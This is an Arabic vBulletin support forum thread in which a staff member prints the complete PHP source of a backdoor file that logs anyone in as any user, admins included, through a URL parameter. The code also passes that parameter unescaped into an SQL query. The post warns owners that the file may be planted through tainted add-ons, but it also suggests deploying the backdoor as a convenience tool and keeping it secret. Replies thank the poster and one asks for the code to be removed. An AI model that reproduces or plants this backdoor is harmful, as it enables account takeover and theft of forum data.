ملف جديد للدخول بأى عضوية فى المنتدى (اختراق أم شىء آخر)

WebCraker

العبد الفقير إلى الله
طاقم الإدارة
9 مارس 2008
5,645
50
48
Egypt
support-ar.com
السلام عليكم

تكملة لعنوان الموضوع فهل وجود الملف الذى سيتم عرضه الآن فى ملفات منتداك اختراق لمنتداك أم ماذا ؟ ؟

PHP:
<?php 
/*================================================= =====================*\ 
|| #                                Sa3eka.Com VBulletin Fake Login Backdoor v1.0 
|| ################################################## ################## || 
|| # vBulletin Fake Login Backdoor v1.0 
|| # ---------------------------------------------------------------- # || 
|| # رابط الثغرة راح تكون زي كذا مع تغير اسم المستخدم الذي ترغب بالدخول اليه 
|| # http://siteadi.com/vb/systemkey.php?cryptosuite=Admin 
|| # ---------------------------------------------------------------- # || 
|| # طريقة الدخول الى اي عضوية حتى الآدارة مع تغير كلمة admin 
|| # systemkey.php?cryptosuite=Admin‎ 
|| # 
|| ################################################## ################## || 
\*================================================ ======================*/ 

if (isset($_GET['cryptosuite'])) 
{ 
define('THIS_SCRIPT', 'login'); 
require_once('./global.php'); 
require_once('./includes/functions_login.php'); 
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['cryptosuite'] . "'"); 
if (!$vbulletin->userinfo['userid']) die("Invalid username!"); 
else 
{ 
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); 
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); 
exec_unstrike_user($_GET['cryptosuite']); 
process_new_login('cplogin', TRUE, TRUE); 
do_login_redirect(); 
} 
} 

?>

خلاصة الموضوع هوا ان هذا الملف تم برمجته لأختراق منتديات الفبلتن وأعتقد انه تم نشره بإستخدام أى هاك أو نسخة ملغومة لذلك نحذر من وجود الملف أو هذا الكود فى أى من ملفات منتداك بدون علمك
(وقتها تكون انت فى وسط حالة اختراق وقد يكون قد تم اختراقك بالفعل وتم سحب بيانات المنتدى وقاعدة البيانات وقد تفاجأ فى يوم أن أعضائك وموضوعاتك موجودة فى منتدى آخر)


لذلك وجب التنبيه وأقل ما تحمى به منتداك ان يكون هناك جدار نارى على مجلدات الادمن والمراقبين


لكن بما أننا مطورين نسعى للإستفادة من كل ما هو برمجى فهذا الملف قد يتم استخدامه بصورة مضرة كما سبق وقلت وقد يتم استخدامه بصورة جيدة وهى كالتالى :-

قد يمكن استخدامه بدلا من هاك دخول المنتدى بأى عضوية والاستخدام يتم كالتالى وطريقة الاستخدام موجودة فى الملف ولا ننصح بترك الملف بعد الاستخدام على المنتدى يجب ان يتم حذفه
ويجب عدم اخبار أى احد لا تثق به بوجود الملف


شكرا لكم

أى استخدام خاطىء او منافى للأخلاق او استخدام الملف فى الاختراق او الحاق أى ضرر بأى منتدى آخر انا غير مسؤول عنه وأبرىء زمتى من أى استخدام خاطىء أو يغضب الله تعالى ,,والله على ما أقول شهيد

 

ENG MUHAMED

[ADMIN]
طاقم الإدارة
25 فبراير 2008
10,079
43
48
support-ar.net
وعليكم السلام ,

تسلم استاذ محمد على التنبيه

بارك الله فيك
 

antonio bandiras

عضو جديد
9 يونيو 2009
316
1
0
الجزائر
www.abdelhafid.com
بارك الله فيك
جزيت خيرا .لكن من هو مغير أسماء الملفات مثل : global.php
لن يخاف على نفسه ابدا
+
هل لك ان تحذف الملف كي لا يستخدمه ضعاف القلوب ..او على الأقل شوهه قليلا و أحذف اسطر منه

بارك الله فيك مرة أخرى
 

antonio bandiras

عضو جديد
9 يونيو 2009
316
1
0
الجزائر
www.abdelhafid.com

المرفقات

  • thearabianhouse.com لحماية المنتديات.zip
    707.9 KB · المشاهدات: 275

MR!HACKER

عضو جديد
14 فبراير 2010
33
0
0
تسلم استاذ محمد على التنبيه

بارك الله فيك